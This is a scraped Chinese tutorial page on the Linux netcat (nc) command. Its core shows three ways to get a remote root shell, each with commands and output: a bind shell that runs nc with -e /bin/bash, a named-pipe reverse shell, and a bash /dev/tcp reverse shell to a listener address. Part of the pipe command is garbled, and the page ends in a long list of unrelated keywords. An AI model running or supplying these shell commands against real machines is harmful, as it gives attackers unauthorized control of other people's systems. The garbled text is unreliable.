linux命令——nc
发表于:2025-12-01 作者:千家信息网编辑
千家信息网最后更新 2025年12月01日,nc帮助文档上面说的是TCP/IP协议中的swiss army knife,是一个使用tcp或udp协议通过网络连接来读写数据的一个简单的多功能的工具!在***中经常用于反弹shell,用于交互式执行
千家信息网最后更新 2025年12月01日linux命令——nc
nc帮助文档上面说的是TCP/IP协议中的swiss army knife,是一个使用tcp或udp协议通过网络连接来读写数据的一个简单的多功能的工具!在***中经常用于反弹shell,用于交互式执行shell,或者用于提权!
基本使用语法:
nc 选项 IP port
基本参数说明:
-l:监听端口,监听入站信息-p:后跟本地端口号-v:显示端口的信息,多数人喜欢使用-vv,但是我用了没看到有什么区别
第一种方法:
第一种的话需要目标主机直接就是外网独立ip才可以,如果是通过内网映射出来的,就不适用这个方法了!
目标主机:
nc -lvp 2222 -e /bin/bash
root@kali:~# nc -lvp 2222 -e /bin/bashlistening on [any] 2222 ...
***主机:
nc 目标机IP 2222
F:\\eth20-CTF-Toolkits\\CTF工具包\\连接工具>nc 192.168.5.128 2222
此时我们查看目标主机:
root@kali:~# nc -lvp 2222 -e /bin/bashlistening on [any] 2222 ...192.168.5.1: inverse host lookup failed: Unknown hostconnect to [192.168.5.128] from (UNKNOWN) [192.168.5.1] 14960
此时我们在***机就可以执行命令了!
F:\\eth20-CTF-Toolkits\\CTF工具包\\连接工具>nc 192.168.5.128 2222whoamirootuname -aLinux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
第二种方法:
第二种方法,需要我们有独立外网ip,用于监听返回来的shell!
目标主机:
root@kali:~# mknod /tmp/backpipe proot@kali:~# /bin/sh 0/tmp/backpipe
***主机:
F:\\eth20-CTF-Toolkits\\CTF工具包\\连接工具>nc -lvp 2222lstn on [any] 2222 ..192.168.5.128: reverse hst chk phailed: h_errno 11004: NO_DATAconnect to [192.168.5.1] from (UNKNOWN) [192.168.5.128] 53404: NO_DATAwhoamirootuname -aLinux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
第三种:
第三种方法需要我们有独立的外网ip,用于接收shell!
目标主机:
root@kali:~# bash -i >& /dev/tcp/192.168.5.1/2222 0>&1
***主机:
F:\\eth20-CTF-Toolkits\\CTF工具包\\连接工具>nc -lvp 2222lstn on [any] 2222 ..192.168.5.128: reverse hst chk phailed: h_errno 11004: NO_DATAconnect to [192.168.5.1] from (UNKNOWN) [192.168.5.128] 53418: NO_DATAroot@kali:~# uname -auname -aLinux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linuxroot@kali:~# whoamiwhoamirootroot@kali:~#exit
工具
主机
目标
方法
工具包
独立
监听
信息
端口
命令
交互式
参数
口号
后跟
多功能
就是
数据
文档
网络
语法
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
网易mc服务器透视挂
闵行区市场软件开发服务收费
SPSS数据库如何排序
金华西林网络技术有限公司
软件开发公司工资分录
2021国家网络安全周主题征文
荣耀战魂服务器价格
南京寅本网络技术有限公司图片
云存储服务器跟网盘
国产化服务器供应厂家
碳资产数据库与管理平台
网络安全教育有关模板
软件开发设备
军武数据库高射机枪
ebsco数据库的使用
量化软件开发用什么
操作系统服务器多久才能上市
供应链数据库有哪些问题
网络安全教育日网络攻击
维护网络安全 提高风险意识
网络技术专业的就业前景
数据库技术讲座
数据库怎么显示出来的
柒柒猫网络技术有限公司
软件开发项目的流程
数据库表最多能包含多少条记录
数据库字段名大写小写
数据库网站开发框架
金税盘安全服务器地址没有
创建db2数据库登录用户